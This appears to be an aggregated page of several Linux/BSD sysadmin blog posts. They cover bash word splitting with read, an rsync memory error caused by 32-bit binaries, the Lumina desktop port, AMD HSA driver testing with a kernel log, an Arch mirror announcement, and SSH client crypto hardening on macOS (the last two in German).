There is also a choice of noglob. However, I wouldn't recommend it since it works around mistakes rather than fixing them, and makes the code rely on a non-standard environment.

Word splitting without globbing

One of the pitfalls I myself noticed lately is the attempt of using unquoted variable substitution to do word splitting. For example:

for i in ${v}; do
    echo "${i}"
done
At a first glance, everything looks fine. ${v} contains a whitespace-separated list of words and we iterate over each word. The pitfall here is that words in ${v} are subject to filename expansion. For example, if a lone asterisk would happen to be there (like v='10 * 4'), you'd actually get all files in the current directory. Unexpected, isn't it?

I am aware of three solutions that can be used to accomplish word splitting without implicit globbing:

  1. setting shopt -s noglob locally,
  2. setting GLOBIGNORE='*' locally,
  3. using the swiss army knife of read to perform word splitting.
Personally, I dislike the first two since they require set-and-restore magic, and the latter also has the penalty of doing the globbing then discarding the result. Therefore, I will expand on using read:

read -r -d '' -a words <<<"${v}"
for i in "${words[@]}"; do
    echo "${i}"
done
While normally read is used to read from files, we can use the here string syntax of bash to feed the variable into it. The -r option disables backslash escape processing that is undesired here. -d '' causes read to process the whole input and not stop at any delimiter (like newline). -a words causes it to put the split words into array ${words[@]} — and since we know how to safely iterate over an array, the underlying issue is solved.

32bit Madness

by Patrick via Patrick's playground »

This week I ran into a funny issue doing backups with rsync:
rsnapshot/weekly.3/server/storage/lost/of/subdirectories/some-stupid.file => rsnapshot/daily.0/server/storage/lost/of/subdirectories/some-stupid.file
ERROR: out of memory in make_file [generator]
rsync error: error allocating core memory buffers (code 22) at util.c(117) [generator=3.0.9]
rsync error: received SIGUSR1 (code 19) at main.c(1298) [receiver=3.0.9]
rsync: connection unexpectedly closed (2168136360 bytes received so far) [sender]
rsync error: error allocating core memory buffers (code 22) at io.c(605) [sender=3.0.9]
Oopsiedaisy, rsync ran out of memory. But ... this machine has 8GB RAM, plus 32GB Swap ?!
So I re-ran this and started observing, and BAM, it fails again. With ~4GB RAM free.

4GB you say, eh? That smells of ... 2^32 ...
For doing the copying I was using sysrescuecd, and then it became obvious to me: All binaries are of course 32bit!

So now I'm doing a horrible hack of "linux64 chroot /mnt/server" so that I have a 64bit environment that does not run out of space randomly. Plus 3 new bugs for the Gentoo livecd, which fails to appreciate USB and other things.
Who would have thought that a 16TB partition can make rsync stumble over address space limits ...

New Lumina source repo and FreeBSD port

by Ken Moore via Official PC-BSD Blog »

By popular demand, the source tree for the Lumina project has just been moved to its own repository within the main PC-BSD project tree on GitHub.

In addition to this, an official FreeBSD port for Lumina was just committed to the FreeBSD ports tree which uses the new repo.

 

By the way, here is a quick usage summary for those that are interested in how “light” Lumina 0.6.2 is on PC-BSD 10.0.3:

System: Netbook with a single 1.6GHz atom processor and 2GB of memory (Fresh installation of PC-BSD 10.0.3 with Lumina 0.6.2)

Usage: ~0.2–0.4% CPU and ~120MB active memory use (no apps running except an xterm with “top” after a couple minutes for the PC-BSD tray applications to start up and settle down)


When ssh and ansible play poorly together

by Dan Langille via Dan Langille's Other Diary »

Last night, this worked fine. This morning, it fails: # ansible-playbook jail-mailjail.yml PLAY [mailjails] ************************************************************** GATHERING FACTS *************************************************************** failed: [mailjail.example.org] => {"failed": true, "parsed": false} invalid output was: Sorry, try again. Sorry, try again. Sorry, try again. sudo: 3 incorrect password attempts TASK: [pkg | install pkg] ***************************************************** FATAL: no hosts matched or all hosts [...]

AMD HSA

by Patrick via Patrick's playground »

With the release of the "Kaveri" APUs AMD has released some quite intriguing technology. The idea of the "APU" is a blend of CPU and GPU, what AMD calls "HSA" - Heterogenous System Architecture.
What does this mean for us? In theory, once software catches up, it'll be a lot easier to use GPU-acceleration (e.g. OpenCL) within normal applications.

One big advantage seems to be that CPU and GPU share the system memory, so with the right drivers you should be able to do zero-copy GPU processing. No more host-to-GPU copy and other waste of time.

So far there hasn't been any driver support to take advantage of that. Here's the good news: As of a week or two ago there is driver support. Still very alpha, but ... at last, drivers!

On the kernel side there's the kfd driver, which piggybacks on radeon. It's available in a slightly very patched kernel from AMD. During bootup it looks like this:
[    1.651992] [drm] radeon kernel modesetting enabled.
[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./kfd_check_installation.sh 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways
These ebuilds can be found here

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included, it mostly works, but appears to go into an infinite loop. Outout looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
^C
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

Spieglein, Spieglein

by Jesco Freund via My Universe »

Mit dem letzten Update der Pacman Mirrorlist wurde mein Arch Linux Spiegelserver als offizieller Tier 2 Mirror mit aufgenommen. Der Spiegel ist zu erreichen unter archlinux.my-universe.com und bietet neben HTTP und HTTPS auch rsync-Unterstützung und ist sowohl über IPv4 als auch über IPv6 zu erreichen.

SSH-Client-Konfiguration unter MacOS

by Karsten via Security-Planet.de »

Beim letzten Beitrag zur SSH-Konfiguration unter Cisco IOS und Cisco ASA fiel mir noch ein, dass man über sinnvolle Anpassungen der Client-Konfiguration auch mal schreiben sollte. Zumindest unter MacOS (und mindestens auch unter Debian und älterem Ubuntu Linux) wird standardmäßig nicht immer die optimale Kryptographie verwendet.
Die SSH-Parameter können an zwei Stellen konfiguriert werden:

  • systemweit unter /etc/ssh_config
  • per User unter ~/.ssh/config
In der systemweiten SSH-Config befinden sich z.B. die folgenden drei Zeilen, die weite Teile der verwendeten Kryptographie bestimmen (genauer gesagt zeigen sie die Defaults):

#Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour
#KexAlgorithms ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
#MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96
Was kann/sollte man ändern:

Ciphers

Wer keine legacy Systeme zu pflegen hat, der könnte alle nicht-AES ciphers entfernen. Aber Geräte wie 2950 Switche sind halt auch noch ab und an anzutreffen. Daher muss man in so einem Fall 3des-cbc auch konfiguriert haben. Die Cipher-Zeile könnte dann folgendermaßen aussehen:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
Laut Manpage (und basierend auf der sowohl unter Mavericks und Yosemite verwendeten OpenSSH-Version 6.2p2) sollten auch die moderneren GCM-Typen unterstützt sein. Wenn die konfiguriert sind, meldet der SSH-Client aber „Bad SSH2 cipher spec“.
Beim Zugriff auf Cisco Router und Switche kommen typischerweise die CBC-Versionen zum Einsatz, da CTR erst ab IOS 15.4 unterstützt ist.

KexAlgorithms
Hier wird der Key-Exchange gesteuert. Meine Konfig-Zeile auf dem Mac ist die folgende:

KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Die ElipticCurve Algorithmen habe ich entfernt, da diese im Verdacht stehen Backdoors zu beinhalten. Die vermutlich vertrauenswürdige curve25519 von D.J. Bernstein ist erst in OpenSSH 6.6p1 enthalten. Diese werde ich bei Verfügbarkeit mit aufnehmen. Als letztes in der Zeile ist weiterhin ein Group1-Exchange (768 Bit), der für Legacy-Geräte benötigt wird.

MACs
Am meisten stört mich, dass eine MD5-Methode die höchste Priorität hat, gefolgt von einer SHA1-Methode. Da sollte die Reihenfolge angepasst werden:

MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
Interessant sind die etm-MACs. Dazu ein kleiner Ausflug in Message Authentication Codes. Die Protokolle SSL, IPsec und SSH verwenden standardmäßig verschiedene Methoden um die Daten zu verschlüsseln und die Integrität zu sichern:

  • SSL: mac-then encrypt. Dabei wird erst der MAC gebildet, dann werden Daten und MAC verschlüsselt.
  • IPsec: encrypt-then-mac. Dabei werden die Daten erst verschlüsselt und dann darüber der MAC gebildet.
  • SSH: encyrpt-and-mac. Die Daten werden verschlüsselt, die MAC wird aber über die Klartextdaten gebildet.
Es hat sich herausgestellt, dass von diesen drei Optionen die von IPsec verwendete Methode die sicherste ist. Diese encrypt-then-mac (etm) Verfahren können auch bei SSH verwendet werden.

Was hat sich jetzt beim Zugriff auf ein IOS-Gerät geändert? Ohne diese Anpassungen sieht die SSH-Session so aus (auf einem Cisco 3560 mit IOS 15.0(2)SE5):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	            Username
1          2.0     IN   aes128-cbc  hmac-md5     Session started   ki
1          2.0     OUT  aes128-cbc  hmac-md5     Session started   ki
Es wird aes-128-cbc mit einem MD5-HMAC verwendet. Nach den Änderungen ist die Krypto etwas besser (im Rahmen der Möglichkeiten des IOS):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	           Username
0          2.0     IN   aes256-cbc  hmac-sha1    Session started   ki
0          2.0     OUT  aes256-cbc  hmac-sha1    Session started   ki
Hier noch einmal die resultierende ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
Update:
Nach einigem Nachdenken kam ich zu dem Ergebnis, dass mir die Aufnahme der Legacy-Verfahren in die Config-Datei irgendwie nicht gefällt. Daher habe ich diese wieder rausgeschmissen und gebe bei der Verbindung zu älteren Geräten die benötigte Crypto direkt an. Hier ein Beispiel für den Zugriff auf einen 2950:

ssh -l ki 10.10.10.200 -o Ciphers="3des-cbc" -o KexAlgorithms="diffie-hellman-group1-sha1"
Und hier die angepasste ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,hmac-sha1
Weitergehende Verbesserungsvorschläge werden gerne angenommen.